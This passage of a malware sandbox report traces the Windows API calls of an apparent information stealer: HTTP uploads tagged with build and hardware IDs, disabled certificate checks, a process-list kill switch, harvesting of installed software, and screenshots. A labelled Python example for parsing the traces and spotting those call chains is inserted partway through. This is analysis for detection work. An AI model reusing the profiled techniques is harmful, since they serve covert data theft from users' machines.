  • Part of subcall function 00343EF3: InternetCrackUrlA.WININET(00000000,00000000,?,00361C14), ref: 00343F5B
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00343FF8
• StrCmpCA.SHLWAPI(?), ref: 00344010
• InternetConnectA.WININET(00361348,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00344151
• HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 0034418B
• InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 003441B2
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E682: lstrcpyA.KERNEL32(00000000,?,0035E266,00000000,00361ECC,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6BB
  • Part of subcall function 0034E682: lstrcatA.KERNEL32(?,?,?,00354A13,00000000,?,?,0035E266,00000000), ref: 0034E6C5
• lstrlenA.KERNEL32(00000000,00000000,?,?,?,00000000,0035E266,00000000,?,?,00000000,?,",00000000,?,build_id), ref: 003443EA
• lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00344403
• HttpSendRequestA.WININET(?,00000000,00000000), ref: 00344417
• InternetReadFile.WININET(?,?,000007CF,00000000), ref: 00344464
• InternetCloseHandle.WININET(?), ref: 0034446F
• InternetCloseHandle.WININET(?), ref: 00344480
• InternetCloseHandle.WININET(?), ref: 00344489
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileOptionReadSend
• String ID: "$------$build_id$f5f5f5$f5f5f5f5f5$hwid
• API String ID: 3006978581-3956332117
• Opcode ID: dd48eb8d515f71cbab1b1f07c61f6a233069363d74f0a2b3018313a0e8b890d3
• Instruction ID: 2d8cc0049c5184fc73bb93cb7b98169e287145d866b1b706c7095b16bdd020f2
• Opcode Fuzzy Hash: dd48eb8d515f71cbab1b1f07c61f6a233069363d74f0a2b3018313a0e8b890d3
• Instruction Fuzzy Hash: B7F17872800109AADB06EBE4DC92DEEB7BCBF25304F554165F512BA091EF34BB49CB54
APIs
• _EH_prolog.MSVCRT ref: 0034F304
• CoInitializeEx.OLE32(00000000,00000000,00361678,003613FC,00361ECC), ref: 0034F319
• CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 0034F32A
• CoCreateInstance.OLE32(003629E0,00000000,00000001,00362910,?), ref: 0034F344
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 0034F37A
• VariantInit.OLEAUT32(?), ref: 0034F3D5
  • Part of subcall function 0034F237: _EH_prolog.MSVCRT ref: 0034F23C
  • Part of subcall function 0034F237: CoCreateInstance.OLE32(00362790,00000000,00000001,003618C0,?,00361678,00000000,00361ECC), ref: 0034F266
  • Part of subcall function 0034F237: SysAllocString.OLEAUT32(?), ref: 0034F273
  • Part of subcall function 0034F237: _wtoi64.MSVCRT ref: 0034F2AE
  • Part of subcall function 0034F237: SysFreeString.OLEAUT32(?), ref: 0034F2C9
  • Part of subcall function 0034F237: SysFreeString.OLEAUT32(00000000), ref: 0034F2D0
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0034F409
• GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F415
• HeapAlloc.KERNEL32(00000000), ref: 0034F41C
• VariantClear.OLEAUT32(?), ref: 0034F45E
• wsprintfA.USER32 ref: 0034F448
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Yara matches
Similarity
• API ID: String$AllocCreateFreeH_prologHeapInitializeInstanceTimeVariant$BlanketClearFileInitProcessProxySecuritySystem_wtoi64lstrcpywsprintf
• String ID: %d/%d/%d %d:%d:%d$InstallDate$ROOT\CIMV2$Select * From Win32_OperatingSystem$Unknown$WQL
• API String ID: 2456697202-271508173
• Opcode ID: 78abbb03d4a10f7b9f58af11c65abc0f28725e9847c594c9ffe95cb79d15ee52
• Instruction ID: cf7bb93e938d2a4b1b3e2cbe5f7e9220d7bd73cb55104746872cff7446b38855
• Opcode Fuzzy Hash: 78abbb03d4a10f7b9f58af11c65abc0f28725e9847c594c9ffe95cb79d15ee52
• Instruction Fuzzy Hash: 3D415771A01228BBDB11DB95DC49EEFBFBCEF49B51F048116F505EA2A0D7749A01CBA0
APIs
  • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
  • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00352043
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003520A1
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 00351471: StrCmpCA.SHLWAPI(00000000,ERROR,?,?,?,?,?,?,?,?,?,?,?,?,ERROR,00351FD9), ref: 003514B2
  • Part of subcall function 00351509: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00351565
  • Part of subcall function 00351509: lstrlenA.KERNEL32(00000000), ref: 00351578
  • Part of subcall function 00351509: StrStrA.SHLWAPI(00000000,00000000), ref: 0035159F
  • Part of subcall function 00351509: lstrlenA.KERNEL32(00000000), ref: 003515B4
  • Part of subcall function 00351509: lstrlenA.KERNEL32(00000000), ref: 003515CF
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0035217B
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 003521D9
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003522B3
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00352311
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 003523EB
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00352449
• StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00352523
• StrCmpCA.SHLWAPI(00000000,ERROR), ref: 0035257B
• Sleep.KERNEL32(0000EA60), ref: 0035258A
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
Yara matches
Similarity
• API ID: lstrcpylstrlen$Sleep
• String ID: ERROR$_J5$_J5$f5
• API String ID: 507064821-1029286630
• Opcode ID: 84eca16f0badc564255cf835eb710ecdc1046d5dad9ce0dffedf14f91e89961c
• Instruction ID: 3b9db40db854aa59482d3637751e2cd83912507ac45aa1f9aa0b00dbc4fcbf00
• Opcode Fuzzy Hash: 84eca16f0badc564255cf835eb710ecdc1046d5dad9ce0dffedf14f91e89961c
• Instruction Fuzzy Hash: EB22DC71900108AADB16FBB0DD57DEF77BCAF25300F814565B816AE092FE34BB48CA61
APIs
• strtok_s.MSVCRT ref: 003508BA
• StrCmpCA.SHLWAPI(?,true,?,?,?,00000104,?,00000104), ref: 00350954
  • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
  • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
• lstrcpyA.KERNEL32(?,?,?,00000104,?,00000104,?,?,?,00000104,?,00000104), ref: 00350A02
• lstrcpyA.KERNEL32(?,00000000), ref: 00350A3A
• lstrcpyA.KERNEL32(?,00000000), ref: 00350A7A
• lstrcpyA.KERNEL32(?,00000000), ref: 00350ABA
• lstrcpyA.KERNEL32(?,00000000), ref: 00350AFA
• strtok_s.MSVCRT ref: 00350C35
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_340000_bind.jbxd
                                                                                                                                                                                      Yara matches
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID: lstrcpy$strtok_s$lstrlen
                                                                                                                                                                                      • String ID: false$true
                                                                                                                                                                                      • API String ID: 2116072422-2658103896
                                                                                                                                                                                      • Opcode ID: 9cb2ee3a6fc7906ff7e5ac84b1ad10de462d313da0ac8ebb6de88e2e10faa919
                                                                                                                                                                                      • Instruction ID: ae949236248ccb3c1a6d71a59fddc159a4fc4206c8084980d55fb0837d2b1bf3
                                                                                                                                                                                      • Opcode Fuzzy Hash: 9cb2ee3a6fc7906ff7e5ac84b1ad10de462d313da0ac8ebb6de88e2e10faa919
                                                                                                                                                                                      • Instruction Fuzzy Hash: 4CB13FB1904209ABDF16EBB4DD45DDE77FCBB08314F144869F509EA061EB31AA49CB50
APIs
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034E5F1: lstrlenA.KERNEL32(?,0000000C,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E5FA
  • Part of subcall function 0034E5F1: lstrcpyA.KERNEL32(00000000,00000000,?,003545F8,0035E266,0035E266,00000000,0000000C,00000000,?,00355A8E), ref: 0034E62E
  • Part of subcall function 0034E6D4: lstrlenA.KERNEL32(?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E6EC
  • Part of subcall function 0034E6D4: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E714
  • Part of subcall function 0034E6D4: lstrcatA.KERNEL32(?,00000000,?,0000000C,?,00355913,?,?,00361408,?,00000000), ref: 0034E71F
  • Part of subcall function 0034E63B: lstrcpyA.KERNEL32(00000000,?,?,0000000C,?,0035592A,00000000,?,?,00361408,?,00000000), ref: 0034E674
  • Part of subcall function 0034FDF3: _EH_prolog.MSVCRT ref: 0034FDF8
  • Part of subcall function 0034FDF3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0034FE1E
  • Part of subcall function 0034FDF3: Process32First.KERNEL32(00000000,00000128), ref: 0034FE2E
  • Part of subcall function 0034FDF3: Process32Next.KERNEL32(00000000,00000128), ref: 0034FE40
  • Part of subcall function 0034FDF3: StrCmpCA.SHLWAPI(?,?), ref: 0034FE54
  • Part of subcall function 0034FDF3: CloseHandle.KERNEL32(00000000), ref: 0034FE65
• CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,?,?,0035E266,00000000), ref: 00354A3C
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00354B12
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00354B2F
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 0034F078: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00361ECC), ref: 0034F095
  • Part of subcall function 0034F078: GetVolumeInformationA.KERNEL32(nK5,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 0034F0C7
  • Part of subcall function 0034F078: GetProcessHeap.KERNEL32(00000000,00000104), ref: 0034F10A
  • Part of subcall function 0034F078: HeapAlloc.KERNEL32(00000000), ref: 0034F111
  • Part of subcall function 00343F7E: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00343FF8
  • Part of subcall function 00343F7E: StrCmpCA.SHLWAPI(?), ref: 00344010
  • Part of subcall function 00350C58: StrCmpCA.SHLWAPI(00000000,block,?,?,00354B8C), ref: 00350C73
  • Part of subcall function 00350C58: ExitProcess.KERNEL32 ref: 00350C7E
  • Part of subcall function 00345AE7: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00345B61
  • Part of subcall function 00345AE7: StrCmpCA.SHLWAPI(?,?,?,?,?,?,?,00361ECC), ref: 00345B79
  • Part of subcall function 003507C0: strtok_s.MSVCRT ref: 003507E1
  • Part of subcall function 003507C0: StrCmpCA.SHLWAPI(00000000,00361B50), ref: 00350812
  • Part of subcall function 003507C0: strtok_s.MSVCRT ref: 00350873
  • Part of subcall function 00345AE7: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345CBA
  • Part of subcall function 00345AE7: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00345CF4
  • Part of subcall function 00345AE7: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00345D1B
  • Part of subcall function 00350475: strtok_s.MSVCRT ref: 00350496
  • Part of subcall function 00350475: strtok_s.MSVCRT ref: 0035051B
• Sleep.KERNEL32(000003E8), ref: 00354E9F
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: Internet$Openlstrcpy$strtok_s$CreateDirectoryHeapProcessProcess32lstrlen$AllocCloseConnectExitFirstH_prologHandleHttpInformationNextOptionRequestSleepSnapshotToolhelp32VolumeWindowslstrcat
• String ID: .exe$1$8`6$_DEBUG.zip$com$f5$f5$http://$stadia$technologies
• API String ID: 4092323695-586740850
• Opcode ID: 652aad01e30748630ccab5b9ac2bae77168347f3880fe0bd70dcf5d7ccf10900
• Instruction ID: 3e2a3de8f381c5650c2b0b694d98d30fa4c38cea0b14f5c3f787e24a15e0ffff
• Opcode Fuzzy Hash: 652aad01e30748630ccab5b9ac2bae77168347f3880fe0bd70dcf5d7ccf10900
• Instruction Fuzzy Hash: 18921D71D00118ABCB16FBA4CC92DEEB7B8BF25304F4541A6F9066E091EF346B49CB91
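The trace lines in these APIs lists follow a fixed shape (optional "Part of subcall function XXXXXXXX:", then API.MODULE, optional argument list, and the "ref:" call-site address), which makes them easy to post-process. The Python below is an added example, not part of the Joe Sandbox report or of the analysed sample: it parses lines copied from the listing above, groups calls by the subcall function they belong to, and flags three orderings that are visible there (the CreateToolhelp32Snapshot/Process32First/Process32Next/StrCmpCA walk in 0034FDF3, the StrCmpCA-then-ExitProcess pair in 00350C58, and the InternetConnectA/HttpOpenRequestA/InternetSetOptionA setup in 00345AE7). It also decodes the InternetSetOptionA arguments: option 0x1F is INTERNET_OPTION_SECURITY_FLAGS, and only the flag bits the example is sure of are named, any others are reported as unknown rather than guessed. The chain names, the "caller" label for calls made directly by the listed function, and the reading of "?" as an argument the sandbox could not resolve are this example's own conventions, not the report's.

```python
"""Parse Joe Sandbox 'APIs' trace lines and flag call orderings worth a second look.
Added example; not part of the report or of the analysed sample."""
import re
from collections import defaultdict

# One trace line: optional bullet, optional "Part of subcall function XXXXXXXX:",
# then API.MODULE, an optional "(args)" list, and the "ref: XXXXXXXX" call site.
TRACE_RE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-F]{8}): )?"
    r"(?P<api>\w+)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)

# Sample input: a subset of lines copied from the listing above.
SAMPLE = """\
  • Part of subcall function 0034FDF3: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0034FE1E
  • Part of subcall function 0034FDF3: Process32First.KERNEL32(00000000,00000128), ref: 0034FE2E
  • Part of subcall function 0034FDF3: Process32Next.KERNEL32(00000000,00000128), ref: 0034FE40
  • Part of subcall function 0034FDF3: StrCmpCA.SHLWAPI(?,?), ref: 0034FE54
  • Part of subcall function 0034FDF3: CloseHandle.KERNEL32(00000000), ref: 0034FE65
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00354B12
  • Part of subcall function 00350C58: StrCmpCA.SHLWAPI(00000000,block,?,?,00354B8C), ref: 00350C73
  • Part of subcall function 00350C58: ExitProcess.KERNEL32 ref: 00350C7E
  • Part of subcall function 00345AE7: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00345CBA
  • Part of subcall function 00345AE7: HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00345CF4
  • Part of subcall function 00345AE7: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00345D1B
• Sleep.KERNEL32(000003E8), ref: 00354E9F
"""

INTERNET_OPTION_SECURITY_FLAGS = 0x1F
# wininet.h SECURITY_FLAG_* bits this example is certain of; anything else is left undecoded.
SECURITY_FLAGS = {
    0x00000080: "SECURITY_FLAG_IGNORE_REVOCATION",
    0x00000100: "SECURITY_FLAG_IGNORE_UNKNOWN_CA",
    0x00000200: "SECURITY_FLAG_IGNORE_WRONG_USAGE",
    0x00001000: "SECURITY_FLAG_IGNORE_CERT_CN_INVALID",
    0x00002000: "SECURITY_FLAG_IGNORE_CERT_DATE_INVALID",
}
KNOWN_MASK = sum(SECURITY_FLAGS)  # bits are disjoint, so the sum is the OR

# Ordered API subsequences to look for inside one function (names are this example's own).
CHAINS = {
    "process-walk-with-name-compare": ["CreateToolhelp32Snapshot", "Process32First", "Process32Next", "StrCmpCA"],
    "string-compare-then-exit": ["StrCmpCA", "ExitProcess"],
    "wininet-request-setup": ["InternetConnectA", "HttpOpenRequestA", "InternetSetOptionA"],
}


def parse_trace(text):
    """Return one dict per recognised trace line; unrecognised lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = TRACE_RE.match(line)
        if not m:
            continue
        args = m.group("args")
        calls.append({
            "func": m.group("sub") or "caller",  # "caller" = the listed function itself
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [] if args is None else args.split(","),
            "ref": int(m.group("ref"), 16),
        })
    return calls


def is_subsequence(pattern, seq):
    """True if every element of pattern appears in seq, in order (gaps allowed)."""
    it = iter(seq)
    return all(any(x == p for x in it) for p in pattern)


def find_chains(calls):
    """Group calls by function, order them by call-site address, and match CHAINS."""
    by_func = defaultdict(list)
    for c in calls:
        by_func[c["func"]].append(c)
    hits = []
    for func, seq in by_func.items():
        apis = [c["api"] for c in sorted(seq, key=lambda c: c["ref"])]
        for name, pattern in CHAINS.items():
            if is_subsequence(pattern, apis):
                hits.append((func, name))
    return hits


def decode_security_options(calls):
    """For InternetSetOptionA(h, INTERNET_OPTION_SECURITY_FLAGS, value, size) return
    (ref, value, known flag names, undecoded bits)."""
    out = []
    for c in calls:
        if c["api"] != "InternetSetOptionA" or len(c["args"]) < 3:
            continue
        try:
            option, value = int(c["args"][1], 16), int(c["args"][2], 16)
        except ValueError:
            continue  # "?" is taken to mean the sandbox could not resolve the argument
        if option != INTERNET_OPTION_SECURITY_FLAGS:
            continue
        names = [n for bit, n in SECURITY_FLAGS.items() if value & bit]
        out.append((c["ref"], value, names, value & ~KNOWN_MASK))
    return out


if __name__ == "__main__":
    calls = parse_trace(SAMPLE)
    for func, name in find_chains(calls):
        print(f"{func}: {name}")
    for ref, value, names, unknown in decode_security_options(calls):
        print(f"{ref:08X}: security flags 0x{value:X} = {names}, undecoded bits 0x{unknown:X}")
```

Run over the sample it reports the three chains and, for the InternetSetOptionA call at 00345D1B, names the IGNORE_UNKNOWN_CA and IGNORE_WRONG_USAGE bits of 0x10300 while leaving 0x10000 undecoded; the same parser can be pointed at a whole exported report to collect every function that walks the process list or disables certificate checks.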
                                                                                                                                                                                      APIs
                                                                                                                                                                                        • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,0035E266,003613FC,00361ECC), ref: 0034EC4A
                                                                                                                                                                                      • RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000,00361678), ref: 0034EC8E
                                                                                                                                                                                      • wsprintfA.USER32 ref: 0034ECB8
                                                                                                                                                                                      • RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 0034ECD1
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,?,?,?), ref: 0034ECFB
                                                                                                                                                                                      • lstrlenA.KERNEL32(?), ref: 0034ED10
                                                                                                                                                                                      • RegQueryValueExA.KERNEL32(?,00000000,?,?,?,00000000,?,?,00000000,?,003613FC), ref: 0034ED81
                                                                                                                                                                                        • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                                                                                                                                                                      • Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                      • Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmpDownload File
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000870000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000874000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000963000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000966000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000096C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000098B000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.00000000009AA000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A43000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000A77000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880380728.0000000000A79000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_340000_bind.jbxd
Yara matches
Similarity
• API ID: OpenQueryValuelstrcpy$Enumlstrlenwsprintf
• String ID: - $%s\%s$?
• API String ID: 1989970852-3278919252
• Opcode ID: 631c04705611263b5e236ae70d06ef501c6710171948d05e72aa8e6683714552
• Instruction ID: 11af9a1fbed1aa3578ff7c6d33e5853560efd84aefcaa2555cbeaa667be3b20a
• Opcode Fuzzy Hash: 631c04705611263b5e236ae70d06ef501c6710171948d05e72aa8e6683714552
• Instruction Fuzzy Hash: D351EA71800119ABDB12EBD0DD85CEEBBBDFF15345F504166F506BA061EB34AB89CBA0
APIs
• memset.MSVCRT ref: 0034FF14
• CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0034FF3C
• GetDesktopWindow.USER32 ref: 0034FF4A
• GetWindowRect.USER32(00000000,?), ref: 0034FF57
• SelectObject.GDI32(?,00000000), ref: 0034FF84
• GetHGlobalFromStream.COMBASE(?,?), ref: 0034FFF5
• GlobalLock.KERNEL32(?), ref: 0034FFFE
• GlobalSize.KERNEL32(?), ref: 00350009
  • Part of subcall function 0034E57D: lstrcpyA.KERNEL32(00000000,00000000,0000000C,?,00355870,0035E266), ref: 0034E5A7
  • Part of subcall function 0034E5B4: lstrcpyA.KERNEL32(00000000,SJ5,SJ5,?,?,00341334,SJ5,0035E266,00000000,?,00354A53,?), ref: 0034E5DA
  • Part of subcall function 003446BD: lstrlenA.KERNEL32(00000000), ref: 0034472B
  • Part of subcall function 003446BD: StrCmpCA.SHLWAPI(?,0035E266,0035E266,0035E266,0035E266), ref: 0034477D
  • Part of subcall function 003446BD: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 0034479D
• SelectObject.GDI32(?,?), ref: 00350068
• DeleteObject.GDI32(?), ref: 00350083
• DeleteObject.GDI32(?), ref: 0035008C
• CloseWindow.USER32(00000000), ref: 0035009B
Strings
Memory Dump Source
• Source File: 00000004.00000002.1879579437.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
• Associated: 00000004.00000002.1879560972.0000000000340000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879601735.000000000035E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1879620823.0000000000366000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.0000000000866000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000004.00000002.1880075791.000000000086C000.00000004.00000001.01000000.00000003.sdmp
